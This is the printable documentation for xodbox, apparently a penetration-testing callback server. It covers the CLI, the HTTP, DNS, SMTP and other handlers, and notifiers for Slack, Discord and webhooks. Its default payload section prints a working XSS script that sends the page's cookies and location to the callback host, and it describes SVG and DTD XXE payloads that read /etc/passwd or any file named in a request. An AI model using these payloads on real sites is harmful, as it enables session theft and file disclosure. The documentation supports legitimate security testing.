This is the multi-page printable view of this section. Click here to print.

Return to the regular view of this page.

xodbox

Network interaction listening post
Docs :: Releases :: Code
Go Tests

Purpose

Quickly determine if an application reaches out to remote network based services. Easily create custom responses to test how applications consume data from network sources.

Features

Multiple listening protocols:

  • HTTP/HTTPS
  • DNS (WIP not finished)
  • FTP
  • SMTP
  • SMB
  • IMAP
  • POP3
  • SSH

Installation

Download a release from GitHub or use Go Install:

go install github.com/defektive/xodbox@latest

Configuration

./xodbox config -e > xodbox.yaml

Handler Configuration

Configuration information for each Handler is documented alongside it’s code in the handlers directory.

Notifier Configuration

Configuration information for each Notifier is documented alongside it’s code in the notifiers directory.

Server Usage

./xodbox

All the magic happens through configuration files in the handlers and notifiers.

Client Usage

When a client makes a connection to xodbox, the logic to respond will be processed by a Handler. Handlers are responsible for seeding their own default data.

Quick Start Guides

Linux

This little snippet will:

  • Download and extract latest release from GitHub.
  • Generate a new config file.
  • create the static and payload directories used by the config file.
wget -q $(wget -q -O - https://api.github.com/repos/defektive/xodbox/releases/latest | grep -o "https:.*Linux_x86_64\.tar\.gz")
tar -xzvf xodbox*.tar.gz
./xodbox config -e | sed 's/^#\(\s*\(payload\|static\)_dir\)/ \1/g' > xodbox.yaml
mkdir -p static payloads/httpx

Bare metal

./xodbox serve

Docker

Currently, we do not have any prebuilt Docker containers. However, you can just run a release with an Alpine container.

docker run \
  --rm \
  --expose 80 \
  -v `pwd`:/app \
  --workdir /app \
  -d alpine \
  ./xodbox serve

Feedback

I have an issue or feature request

Sweet! Open an issue to start the conversation.

Wait… I want the old node version

Really? ok we made a tag just for you.

https://github.com/defektive/xodbox/releases/tag/legacy-nodejs

1 - Xodbox CLI

Xodbox CLI Reference

Synopsis

A network interaction listening post.

  • Quickly determine if an application interacts with network services.
  • Easily create custom responses to interaction requests.

Options

      --config string   Config file path (default "xodbox.yaml")
      --debug           Debug mode
  -h, --help            help for xodbox
      --reset-db        Reset database

SEE ALSO

Auto generated by spf13/cobra on 26-Feb-2025

1.1 - Completion

Generate completion script

Synopsis

To load completions:

Bash:

source <(xodbox completion bash)

# To load completions for each session, execute once:
# Linux:
xodbox completion bash > /etc/bash_completion.d/xodbox
# macOS:
xodbox completion bash > /usr/local/etc/bash_completion.d/xodbox

Zsh:

# If shell completion is not already enabled in your environment,
# you will need to enable it.  You can execute the following once:
echo "autoload -U compinit; compinit" >> ~/.zshrc

# To load completions for each session, execute once:
xodbox completion zsh > "${fpath[1]}/_xodbox"

# You will need to start a new shell for this setup to take effect.

fish:

xodbox completion fish | source

# To load completions for each session, execute once:
xodbox completion fish > ~/.config/fish/completions/xodbox.fish

PowerShell:

xodbox completion powershell | Out-String | Invoke-Expression

# To load completions for every new session, run:
xodbox completion powershell > xodbox.ps1
# and source this file from your PowerShell profile.

xodbox completion [bash|zsh|fish|powershell]

Options

  -h, --help   help for completion

Options inherited from parent commands

      --config string   Config file path (default "xodbox.yaml")
      --debug           Debug mode
      --reset-db        Reset database

SEE ALSO

  • xodbox - A network interaction listening post
Auto generated by spf13/cobra on 26-Feb-2025

1.2 - Config

generate/print config

Synopsis

generate/print config

xodbox config [flags]

Options

  -h, --help   help for config

Options inherited from parent commands

      --config string   Config file path (default "xodbox.yaml")
      --debug           Debug mode
      --reset-db        Reset database

SEE ALSO

  • xodbox - A network interaction listening post
Auto generated by spf13/cobra on 26-Feb-2025

1.3 - Payload

Manage payloads.

Synopsis

manage payloads.

Options

  -h, --help   help for payload

Options inherited from parent commands

      --config string   Config file path (default "xodbox.yaml")
      --debug           Debug mode
      --reset-db        Reset database

SEE ALSO

Auto generated by spf13/cobra on 26-Feb-2025

1.4 - Payload Dump

dump payloads.

Synopsis

dump payloads.

xodbox payload dump [flags]

Options

  -h, --help   help for dump

Options inherited from parent commands

      --config string   Config file path (default "xodbox.yaml")
      --debug           Debug mode
      --reset-db        Reset database

SEE ALSO

Auto generated by spf13/cobra on 26-Feb-2025

1.5 - Serve

Start xodbox server.

Synopsis

Start xodbox server.

xodbox serve [flags]

Options

  -h, --help   help for serve

Options inherited from parent commands

      --config string   Config file path (default "xodbox.yaml")
      --debug           Debug mode
      --reset-db        Reset database

SEE ALSO

  • xodbox - A network interaction listening post
Auto generated by spf13/cobra on 26-Feb-2025

1.6 - Update

Update xodbox to latest version

Synopsis

Update or check for updates. The default update method is to download the latest release from GitHub.

xodbox update [flags]

Examples

# Update to latest version
xodbox update

# Use go install to update
xodbox update -g

# Download from a specific URL
# Not sure why anyone else would need this. I use it for quickly testing builds on different machines.
xodbox update -u http://10.0.0.2:8000/dist/xodbox_darwin_arm64/xodbox

# This is typically used after I run the following:
#	goreleaser release --clean --snapshot
#	python -m http.server

Options

  -C, --check        Check for update
  -f, --force        Force update, even if release is not newer
  -g, --go-install   Use go install instead of downloading release from GitHub
  -h, --help         help for update
  -u, --url string   URL to download from (force implies)

Options inherited from parent commands

      --config string   Config file path (default "xodbox.yaml")
      --debug           Debug mode
      --reset-db        Reset database

SEE ALSO

  • xodbox - A network interaction listening post
Auto generated by spf13/cobra on 26-Feb-2025

2 - Handlers

Interaction handlers

Handlers are services that listen on ports and respond to requests.

2.1 - DNS

DNS Handler

Configuration

KeyValues
handlerMust be DNS
listenerDefault :53
default_ipAn IP address default will be whatever is detected as the server’s public IP.

2.2 - HTTPX

HTTPX Handler

Purpose

Speak HTTP to other computers you may or may not control….

Configuration

KeyValues
handlerMust be HTTPX
listenerDefault :80
static_dirDirectory to host static files from
payload_dirDirectory to import payloads from
acme_emailEmail to use for your ACME account
acme_acceptA dumb way to force you to ensure you agree to the ACME provider’s (Most likely Let’s Encrypt) TOS
acme_urlhttps://acme-staging-v02.api.letsencrypt.org/directory, https://acme-v02.api.letsencrypt.org/directory, or one of these: Certmagic acmeissuer.go
tls_namesYour domains to get TLS certificates for comma separated. I had to do wildcards first, not sure if that was a staging or dns provider issue.
dns_providerCurrently, namecheap or route53 but we can support anything libdns supports…
dns_provider_api_userUsername for API calls. Only used for namecheap ATM.
dns_provider_api_keyKey for API calls. Only used for namecheap ATM.

Filters

The entire HTTP request is used to match filters. To alert on a specific prefix the following filter would be used.

"(GET|POST|HEAD|DELETE|PUT|PATCH|TRACE) /myPrefix"

This would match:

And would not match:

Additional Information

Things are still being created, documented, and fine-tuned.

New Features

  • Let’s Encrypt Auto Cert
  • Exfil data saver

Legacy Functionality to be implemented.

  • robots.txt
  • unfurly
  • arbitrary json
    • b64
  • redirect
    • b64
  • basic auth
  • breakfastbot
  • allow origin *

Legacy functionality that isnt specific to a handler

  • alert pattern with payload
  • alert pattern (alert patterns are part of notifiers, maybe we need to expose alert patterns based on handler type)
  • slack hook (this is now a notifier)

2.2.1 - Default Payloads Seeds

seed data

Default payloads that come with xodbox.

2.2.1.1 - Default Header

Adds the default header to all HTTP responses.

Adds an HTTP header to all HTTP responses.

Example Request

curl -i http://xodbox.test/

Example Response

Server: BreakfastBot/1.0.0

2.2.1.2 - Redirect

HTTP Redirects

HTTP Redirects to the query parameter l using the query param s as the status code.

WhatDescriptionGET Parameters
LocationLocation to redirect tol
StatusHTTP status codes

Example Request

curl -i "http://xodbox.test/redir?l=https://github.com/defektive/xodbox&s=301"

Example Response

Location: https://github.com/defektive/xodbox

2.2.1.3 - Robots TXT

A restrictive robots.txt

Simple robots txt to prevent indexing.

Example Request

curl http://xodbox.test/robots.txt

Example Response

User-Agent: *
Disallow: /

2.2.1.4 - Inspect

Reflect back HTTP requests in various formats

Depends on an internal code

/inspect

Inspect or reflect the request back in various formats.

  • Plain Text (default, .txt)
  • HTML (.html, .html)
  • GIF (.gif)
  • JPEG (.jpg)
  • PNG (.png)
  • MP4 (.mp4)
  • XML (.xml)
  • JSON (.json)
  • Javascript (.js)

Examples

  • http://localhost/inspect
  • http://localhost/some/random/path/inspect.gif

2.2.1.5 - XSS HTML

Returns HTML that embeds xss-js

/jsc.html

Simple HTML to load simple JS Payload.

2.2.1.6 - XSS JavaScript

Returns JS that embeds an image back to xodbox

/jsc

Simple JS Payload. Useful form embedding or quickly copying and modifying for an XSS payload to prove execution and exfil.

(function (){
    var s = document.createElement("img");
    document.body.appendChild(s);
    s.src="//{{.Request.Host}}/jscb?src="+window.location+"&c="+document.cookie;
})()

2.2.1.7 - Default Favicon

Redirects to the default logo.

Redirects to the embedded default logo, exposed via embedded fs.

Example Request

curl -i http://xodbox.test/favicon.ico

2.2.1.8 - HTML Iframe

HTML page with iframe and image callback

/ht

Iframe callback

2.2.1.9 - Open Graph

Embed request params in open graph elements.

Useful for unfurlers. Maybe we should merge this into inspect…

Example Request

curl -i "http://xodbox.test/unfurl"

Example Response

Location: https://github.com/defektive/xodbox

2.2.1.10 - XXE Callback

More XXE

XXE Callback used by xxe-system

2.2.1.11 - XXE DTD

More XXE

/dt

A vulnerable application for testing is in ../../../../cmd/xodbox-validator

/evil.dtd

dtd for use by others

2.2.1.12 - XXE SVG Hostname

Returns an SVG payload with XXE to get files

/sh

attempts to get /etc/hostname

SVG with XXE payloads

2.2.1.13 - XXE SVG Passwd

Returns an SVG payload with XXE to get files

/sp

attempts to get /etc/passwd

2.2.1.14 - XXE SVG Request Params

Returns an SVG payload with XXE to get files

/sv

attempts to get whatever files is supplied via the f query parameter

2.2.1.15 - XXE System

More XXE

/dt

A vulnerable application for testing is in ../../../../cmd/xodbox-validator

2.2.1.16 - Default Page

returns a simple page if nothing is matched

Adds an HTTP header to all HTTP responses.

Example Request

curl -i http://xodbox.test/

Example Response

hi

2.2.1.17 - In Development Seeds

These seeds are not ready for production and may never be.

Seeds that are not tested or finished.

2.2.1.17.1 - WPAD

Returns a WPAD config file (Javascript).

WPAD Proxy. Not really useful at the moment. Should be more useful in the future

2.2.2 - Example Payloads

Examples

Default payloads that come with xodbox.

2.2.2.1 - List Payloads

List payloads

List Payloads

---
title: List Payloads
description: List payloads
weight: 1
pattern: /i-forgot-how-things-work$
is_final: true
data:
  headers:
    Content-Type: text/plain
  body: |
    Payloads
    
    {{ range .Payloads }}
    {{ .Pattern }} - {{ .Name }} [{{ .Type }}]
    {{ .Description }}
    
    {{ end }}    
---

3 - Notifiers

Interaction notifiers

Notifiers are used to send notifications to external services or log interactions to the app log.

Filters

Each notifier will accept a filter configuration option. This option will be compiled into a golang regexp object. What it is executed against depends on the event it is executing against. For HTTPX events it will be the entire HTTP request. This would be a simple example of matching a specific path prefix (GET|POST|HEAD|DELETE|PUT|PATCH|TRACE) /x/.

Be sure to check each handler for mor information on what it’s event supplies for filter matching.

3.1 - App Log

Log to application log

Structured loggoing output

time=2025-02-26T14:57:03.838-07:00 level=INFO msg="InteractionEvent received" xodbox.pkg=github.com/defektive/xodbox/pkg/notifiers/app_log details="HTTPX: GET /l/face from 127.0.0.1:56407"

Configuration

KeyValues
notifierMust be app_log

3.2 - Discord

Discord notification

Discord Notification

Configuration

KeyValues
notifierMust be discord
urlWebhook URL
authorUsername to appear in slack. (optional) d
author_imageEmoji code to use for user’s avatar. (optional)
filterGolang regexp.

3.3 - Slack

Slack notifications

Slack Notification

Configuration

KeyValues
notifierMust be slack
urlWebhook URL
authorUsername to appear in slack. (optional)
author_imageEmoji code to use for user’s avatar. (optional)
channelChannel to post to, can be a user’s ID. (optional)
filterGolang regexp.

3.4 - Webhook

Generic HTTP Webhook

Post logic is used by the Slack and Discord webhooks.

4 - xodbox-validator

validate xxe payloads

Purpose

To make sure XXE payloads are executing properly.

Usage

./xodbox-validator